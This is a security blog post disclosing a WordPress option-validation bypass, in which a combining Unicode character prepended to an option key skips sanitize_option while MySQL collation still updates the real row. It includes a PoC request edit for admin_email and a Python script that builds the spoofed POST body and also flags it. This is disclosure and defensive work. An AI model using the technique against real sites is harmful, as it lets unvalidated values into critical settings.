slavco
Mar 20

I have already covered the handling of protected meta in WordPress and discussed how WordPress is a PHP/MySQL application; now it is time to look at how WP behaves with its options.

Options in WordPress are Administrator territory and are considered dangerous, but WordPress itself validates the values users try to store in them. This matters where a plugin's administrative area calls update_option on user input, and also for WordPress itself when it is offered as a customized SaaS / managed WordPress with measures that prevent WP Administrators from performing critical operations on the system.

Options protection

If we look at wp-admin/options.php we see that an Administrator (or, on multisite, a Network Administrator) reaches an update_option call with user input: the option names come from the page_options field of the POST and the values from the fields with those names. This is fine, because update_option validates the value: it calls sanitize_option, which prevents meddling with some of the critical option values. For instance, the mail server for posting via email must be a valid host, admin_email must be a valid (by WordPress' definition) email address, many values are cast to integers, and so on. So this protection has its purpose, but it is bypassable. How?

Bypassing update_option

It is straightforward. sanitize_option decides what to validate by matching the option key literally, and options.php only trim()s the key before passing it on. So if we craft an option key that starts or ends with some interesting character(s), the key no longer matches any case in sanitize_option and the value goes through unvalidated, while the UPDATE that stores it still reaches the real row: update_option uses the option key in the SQL WHERE clause, and MySQL compares it under the wp_options collation. With the utf8mb4_unicode_ci family WordPress picks by default, a combining mark such as U+035D (Combining Double Breve) has zero weight, so '͝admin_email' compares equal to 'admin_email'.

PoC

If we capture a valid POST request to /wp-admin/options.php (the All Settings form, option_page=options), only the following change is needed in order to set admin_email to anything:

Find admin_email in the captured request, both in the page_options list and as the name of the field carrying the value, and change it to

͝admin_email

i.e. prepend the character U+035D (Combining Double Breve) and put anything as the value. sanitize_option never sees the key admin_email, so the email check does not run, yet the UPDATE still lands on the admin_email row.

Attack surface

  • Any CSRF or nonce theft against an Administrator is now more dangerous, since the forged request is no longer limited to values sanitize_option accepts
  • Any SaaS / managed WordPress that relies on this validation to stop Administrators from doing certain things
  • Any options-based backdoor is now exploitable, because the value that reaches the database is no longer validated
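As an added example (mine, not code from this post or from WordPress core) covering both the bypass mechanism above and the request-side check a host could put in front of wp-admin: it models the two notions of "same option name" the trick plays against, builds the PoC body, and flags such bodies. Assumptions that are not from the post: the validated option list is a constructed subset of what sanitize_option knows; the collation is approximated as "combining marks weigh nothing, case is ignored", standing in for MySQL's utf8mb4_unicode_ci behaviour rather than reimplementing it; the function names, nonce and request values are mine.

```python
"""Added example, not code from slavco's post or from WordPress.

Two notions of "same option name":
  * PHP side: options.php trim()s the key, sanitize_option() matches it byte for byte.
  * MySQL side: the UPDATE's WHERE clause is compared under the wp_options collation.
The collation is approximated below as "strip combining marks, ignore case" (an
assumption about the utf8mb4_unicode_ci family, not MySQL's real algorithm).
All option names, nonces and request values here are constructed.
"""
import unicodedata
from typing import Iterable, List, Optional, Tuple
from urllib.parse import parse_qsl, urlencode

# Constructed subset of the option names sanitize_option() validates.
VALIDATED_OPTIONS = ("admin_email", "new_admin_email", "mailserver_url", "siteurl", "home")

COMBINING_DOUBLE_BREVE = "\u035d"  # U+035D, the character used in the PoC

PHP_TRIM_CHARS = " \t\n\r\0\x0b"   # PHP trim() default character set


def php_side_key(raw_key: str) -> str:
    """What options.php does to a key before update_option(): trim() and nothing else."""
    return raw_key.strip(PHP_TRIM_CHARS)


def is_validated(raw_key: str) -> bool:
    """sanitize_option() switches on the literal key: no exact match, no validation."""
    return php_side_key(raw_key) in VALIDATED_OPTIONS


def collation_fold(key: str) -> str:
    """Approximate a *_unicode_ci comparison: combining marks (Mn) weigh nothing, case is ignored."""
    decomposed = unicodedata.normalize("NFD", key)
    return "".join(c for c in decomposed if unicodedata.category(c) != "Mn").casefold()


def row_hit_by_update(raw_key: str, existing_names: Iterable[str]) -> Optional[str]:
    """The wp_options row that UPDATE ... WHERE option_name = %s would match for this key."""
    wanted = collation_fold(php_side_key(raw_key))
    for name in existing_names:
        if collation_fold(name) == wanted:
            return name
    return None


def craft_options_post(nonce: str, option: str, value: str,
                       prefix: str = COMBINING_DOUBLE_BREVE) -> str:
    """Body of the All Settings form POST to /wp-admin/options.php with the key renamed in
    both places it occurs: the page_options list and the field carrying the value.
    The nonce is the Administrator's own; this does not bypass authentication."""
    spoofed = prefix + option
    fields = [
        ("option_page", "options"),
        ("action", "update"),
        ("_wpnonce", nonce),
        ("page_options", spoofed),
        (spoofed, value),
    ]
    return urlencode(fields)


def spoofed_keys_in_post(body: str,
                         validated: Iterable[str] = VALIDATED_OPTIONS) -> List[Tuple[str, str]]:
    """Request-side check, e.g. in a proxy in front of wp-admin: keys listed in page_options
    that are not a validated option byte for byte but would collate equal to one."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    if params.get("option_page") != "options":
        return []
    findings = []
    for raw in params.get("page_options", "").split(","):
        key = php_side_key(raw)
        folded = collation_fold(key)
        for target in validated:
            if key != target and collation_fold(target) == folded:
                findings.append((key, target))
    return findings


if __name__ == "__main__":
    spoofed = COMBINING_DOUBLE_BREVE + "admin_email"
    body = craft_options_post("0123456789", "admin_email", "not an email at all")
    print(body)
    print("validated by sanitize_option:", is_validated(spoofed))
    print("row the UPDATE hits:", row_hit_by_update(spoofed, ["siteurl", "home", "admin_email"]))
    print("flagged:", spoofed_keys_in_post(body))
```

Running it prints the PoC body with %CD%9Dadmin_email in both page_options and the field name; is_validated is False for that key while row_hit_by_update still returns the admin_email row, which is the whole bypass in two calls. spoofed_keys_in_post is the same comparison turned into a check; inside WordPress the equivalent guard belongs in a pre_update_option filter, or simply in a rule that refuses option keys containing anything outside printable ASCII.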

Promo

If you are a WP developer, WP host provider or WP security product provider with a valuable list of clients, we offer a subscription list, and we are exceptional (B2B only).

websec

Attack sources + web application security
